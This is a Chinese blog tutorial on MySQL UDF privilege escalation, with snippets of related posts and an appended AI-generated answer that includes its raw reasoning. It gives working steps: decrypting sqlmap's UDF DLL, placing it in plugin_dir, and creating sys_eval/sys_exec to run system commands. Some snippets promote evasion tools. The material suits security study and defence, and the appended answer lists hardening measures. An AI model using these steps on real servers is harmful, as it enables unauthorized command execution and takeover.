udf提权总结(Mysql)

最新推荐文章于 2024-10-10 08:20:15 发布
最新推荐文章于 2024-10-10 08:20:15 发布
阅读量948 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Mikasa_/article/details/89878927
本文介绍了MySQL中的用户定义函数(UDF)提权技术,包括如何使用sqlmap解密加密的DLL文件,如何在MySQL命令行创建命令执行函数,以及如何利用UDF执行系统命令。虽然尝试自动注入DLL失败,但提供了相关参考链接以供进一步研究。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

什么是udf

 udf = ‘user defined function‘,即‘用户自定义函数’。
 是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。
 udf在mysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,文件后缀为‘.dll’,常用c语言编写。

既然支持自定义函数那么我们如果想定义一个可以执行系统命令的函数也是可以的吧?

于是就有了udf提权。。

怎么使用udf提权呢

首先在sqlmap中就已经集成了这个dll。储存与SQLMAP相对路径下的 /udf/msql中
在这里插入图片描述
可以看到并不是一个dll文件,这是因为sqlmap防止查杀将文件做了加密。。需要我们用sqlmap自带的脚本解密一下。
该脚本位于sqlmap相对路径下的 /extra/cloak
在这里进行解密
打开cmd,定位到这个路径。。
输入命令: python2 cloak.py -d -i E:\pythpn27\SQLMap\udf\mysql\windows\32\lib_mysqludf_sys.dll_

注意:后面的路径就是你的dll_文件的绝对路径

解密后就有了这个dll文件。。
在这里插入图片描述

于是进入mysql命令行或其他可以执行命令的地方。。

执行以下命令(用于收集信息):

select  @@plugin_dir;   得到dll文件的储存位置

在这里插入图片描述

接下来将我们解密出来的dll文件复制到这个目录下

在这里插入图片描述

进入命令行创建命令执行函数(这里面提供两个):

create function  sys_eval returns string soname 'lib_mysqludf_sys.dll';
create function  sys_exec returns string soname 'lib_mysqludf_sys.dll';

创建完成后就可以直接运用执行系统命令了。
在这里插入图片描述
弹注册表。。
在这里插入图片描述
可以看到直接调用到了cmd来执行命令。

总结:原本想用sqlmap进行自动化的注入dll文件的。。但是发现没有权限写入。。。。。

下次试试win7吧。。

参考文章:https://www.sohu.com/a/246939954_610486
https://www.cnblogs.com/websecyw/p/9172994.html

网络安全系列&网安实践系列:利用MSF对MYSQL进行简单的UDF
weixin_54626591的博客
10-23 254
利用MSF对MYSQL进行简单的UDF
vulnhub靶场【Raven系列】之2 ,对于mysql udf的复习
China_I_LOVE的博客
01-15 1063
该靶场与前面靶场raven-1考察点是一样的,不过这里ssh爆破取消了。网站目录爆破,发现名信息使用php mailer对应的版本漏洞进行复习操作获取反弹shell后,发现mysql与wordpress连接的数据库文件上传pspy64获取到mysql以root身份运行的,所以限很高查看到wordpress的用户密码后,能破解的,还是登录网站查看,因为可能有其他敏感信息,多收集测试mysql udf有无条件,也就是安全策略方面,能否写入和导出,以及插件目录的限等等。
udf.zip工具
04-30
udf工具
MySQL扩展接口UDF
Jim的博客
08-18 1614
一、MySQL自定义函数UDF 1.UDF介绍 udf(user-defined function)MySQL的一个拓展接口,也称为自定义函数。 2. UDF条件 1)目标系统是Windows(win2000,XP,win2003) 2)可以将udf.dll写入到相应目录的限。(如果Mysql版本大于5.1版本,udf.dll文件必须放置于MySQL安装目录下的lib\plu
udf
river
04-23 613
udf小结 00x1 首先判断mysql版本, mysql版本 < 5.2 , UDF导出到系统目录c:/windows/system32/ mysql版本 > 5.2 ,UDF导出到安装路径MySQL\Lib\Plugin\ 一般Lib、Plugin文件夹需要手工建立(可用流模式突破进而创建文件夹) 可能会用到的命令: select @@datadir 路径 s...
UDF
weixin_46248422的博客
07-29 239
mysql有两种方式:UDF和MOF 1.UDF工具 mysql>grant all privileges on *.* to'root'@'%'identified by '123456' with grant option; mysql>flush privileges; 出现下图情况需要进行限设置: 显示登陆成功后再进行后续操作: 出现下图情况需要进行设置:my.ini(Windows系统)或者my.cnf(Mac系统)文件[mysqld...
MySQLUDF
2301_76227305的博客
06-08 3067
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
MySQL UDF原理
weixin_45626840的博客
10-10 1199
看了许多视频和文章,对UDF讲得都不是很清楚,遂搜索了一下MySQL的基础知识,总结了一下,供各位初学的师傅参考。user-defined functions (UDFs),用户自定义函数,不过,这已经是过时的说法了,MySQL官方文档现在把它称作(可加载函数),是MySQL可在运行时加载执行以扩展功能的机制。我们大可把它理解为是一个插件,而且其本质也是一个动态链接库。官方文档很清楚地说明了,一个可加载函数会被编译为库文件(Windows下文.dll,Linux下为.so),然后使用和。
MySQL UDF 初探
GreatSQL2021的博客
08-07 462
''(empty string),不限制导入和导出的目录。只需将so写到plugin_dir,能创建so自定义函数。存在漏洞风险dirname(指定目录),限制导入和导出为指定目录。如果指定的目录和plugin_dir相同,能正常创建so自定义函数,存在漏洞风险;否则不能创建so自定义函数null,禁止导入和导出操作,不存在漏洞风险账号无论采用哪种方式启动数据库(systemctl start mysqlmysqld、mysqld_safe)后的账号根据mysqld进程uid确定。
MYSQL高版本低版本UDF工具
06-20
MYSQL高版本低版本UDF工具 很好用的UDF使用 有两个版本
mysqludf
09-20
mysql免杀UDF 必不可少神器。必须配备
mysql udf文件
02-01
mysql udf文件mysql udf文件
暗月mysql全版本通杀神器-V2014
01-13
暗月mysql全版本通杀神器-V2014,亲测真实有效,可用。如有侵,请联系优快云管理员删除即可
MySQL UDF
小水池
08-08 9263
0x00 原理 udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。 通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system限。   0x01 思路   1. 将udf文件上传到指定位置  sqlmap中有现成的udf文件,分为32位和64位...
MySQLUDF(附带大马)
07-25 1994
MysqlUDF
MYSQL UDF手动及自动化工具使用
qq_45373631的博客
11-22 3913
UDF手工及自动化工具使用
攻防演练作为红方:postgresqlUDF ,及其好用的工具
keyboard专栏
04-28 1406
在 PostgreSQL 中,用户定义的函数(UDF是一种常见的限的方法,尤其是当你已经获得了数据库的访问限但需要更高级别系统限时。UDF 涉及在数据库中创建或使用函数,这些函数可以执行系统级别的命令,从而允许攻击者在数据库服务器上执行任意代码。
mysql 5.5 udf_MySQL_UDF
weixin_31548723的博客
01-27 727
大三就快结束啦,也要轮到我找工作啦,结合网上的资料和自己的经验准备了一些材料,算是对自己技术方面的小小总结吧。趁这个机会查缺补漏做一些原来知道但没有动手试过的实验。一、原理udf 即 user defined function,文件后缀为.dll。通过在 udf 文件中定义新函数,可以对 mysql 的功能进行扩充,利用 mysql 账号 root 限创建可以执行系统命令函数的 udf.dll ...
mysqludf条件
最新发布
03-12
<think>好的,用户现在问的是MySQLUDF条件。首先,我需要明确用户的问题是什么。UDF指的是利用MySQL的用户定义函数(User-Defined Functions)来限,通常用于从普通数据库用户升到系统级限,进而执行系统命令或访问受限资源。用户可能是想了解如何实现这种,或者想知道如何防范,因此需要详细说明条件和步骤,同时醒安全风险。 接下来,我需要回忆UDF的基本原理。MySQLUDF允许用户通过编写共享库(如.dll或.so文件)来扩展数据库功能。当这些库被加载后,可以执行系统命令。但需要满足几个条件:首先,要有文件写入限,将UDF库文件上传到服务器的特定目录;其次,MySQL服务需要有足够的限来执行这些函数;最后,可能需要知道系统的目录结构,比如插件目录的位置。 然后,要考虑用户可能的背景。用户可能是安全研究人员、开发人员或者系统管理员。如果是攻击者,他们可能寻找存在漏洞的MySQL配置;如果是防御者,他们想知道如何加固系统。因此,回答需要中立,既要解释方法,也要给出防御建议,避免被滥用。 需要分步骤详细说明条件,比如MySQL版本、secure_file_priv设置、插件目录的写入限、root用户限等。同时,注意用户是否有足够的限执行CREATE FUNCTION,以及是否禁用了一些安全选项如apparmor或selinux。 还要考虑不同操作系统下的差异,比如Windows和Linux的目录结构不同,UDF库的扩展名也不同。此外,高版本的MySQL可能对UDF有更多限制,比如对插件目录的严格控制,或者secure_file_priv的默认设置更严格。 需要醒用户,UDF属于高危操作,未经授使用是违法的,回答中应强调合法性和授测试的重要性。同时,防御措施部分需要具体,如限制文件写入限、使用最小限运行MySQL、定期更新补丁等。 可能用户没有到的深层需求是,如何检测系统是否存在被UDF的风险,或者如何修复已存在的漏洞。因此,在回答中加入防御和检测方法会更全面。 最后,确保回答结构清晰,分点列出条件和步骤,使用技术术语但保持易懂,避免过于晦涩。同时,使用Markdown格式增强可读性,如代码块和加粗重点部分。</think>--- ### **MySQL UDF条件及原理分析** UDF(User-Defined Function,用户自定义函数)是通过MySQL插件机制执行系统命令的高危操作,其成功需满足以下核心条件: --- #### **一、基础条件** 1. **MySQL版本支持UDF** - 仅支持动态链接库(Windows的`.dll`/Linux的`.so`)加载的版本 - 典型漏洞版本:`MySQL < 5.1`(默认允许任意目录加载插件),高版本需特定目录 2. **文件写入限** - 攻击者需能将恶意UDF库文件写入服务器(例如通过`SELECT ... INTO DUMPFILE`) - **关键配置检查**: ```sql SHOW VARIABLES LIKE 'secure_file_priv'; -- 若值为空或指定可写目录,则风险较高 ``` 3. **MySQL运行限** - MySQL服务进程(如`mysqld`)需具备执行系统命令的限 - Linux系统:若以`root`运行mysqld,可直接(但生产环境极少见) - Windows系统:依赖`NT AUTHORITY\SYSTEM`等高限账户 --- #### **二、核心步骤** 1. **上传恶意UDF库** - 通过Web应用漏洞或SQL注入上传文件(如`lib_mysqludf_sys.so`或`raptor_udf2.dll`) - 写入MySQL插件目录(路径需通过查询获取): ```sql SHOW VARIABLES LIKE 'plugin_dir'; -- 示例输出:/usr/lib/mysql/plugin/ ``` 2. **创建UDF函数** ```sql CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf_library.so'; -- 或 Windows环境 CREATE FUNCTION sys_exec RETURNS STRING SONAME 'raptor_udf2.dll'; ``` 3. **执行系统命令** ```sql SELECT sys_exec('id > /tmp/exploit.txt'); -- Linux系统命令执行 SELECT sys_exec('whoami > C:\\exploit.txt'); -- Windows系统命令执行 ``` --- #### **三、防御与限制** 1. **限最小化** - 以低限用户运行MySQL服务(例如专用`mysql`账户,禁止`root`限) - 限制`FILE`限: ```sql REVOKE FILE ON *.* FROM 'mysql_user'@'%'; ``` 2. **安全配置加固** - 设置`secure_file_priv`为不可写目录(例如`/NULL/`) ```ini [mysqld] secure_file_priv = /dev/null ``` - 禁用`CREATE FUNCTION`限(非必要场景) 3. **系统级防护** - 限制`plugin_dir`目录的写入限(例如`chmod 555 /usr/lib/mysql/plugin/`) - 启用SELinux/AppArmor限制MySQL进程行为 4. **补丁与监控** - 升级至MySQL 8.0+(默认更严格的文件限控制) - 监控异常文件操作(如`INTO DUMPFILE`语句)和UDF函数创建行为 --- #### **四、实际利用限制** - **高版本MySQL限制**:默认`secure_file_priv`设置为非空,且`plugin_dir`不可自定义写入 - **防御软件拦截**:EDR类产品可检测`sys_exec`等敏感函数调用 - **限分离**:若MySQL以非特用户运行,后仅能获得该用户限 --- ### **总结** UDF的核心在于**文件写入+高限运行环境**。防御需结合数据库配置、操作系统限和实时监控,重点阻断攻击链中的文件上传和函数创建环节。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值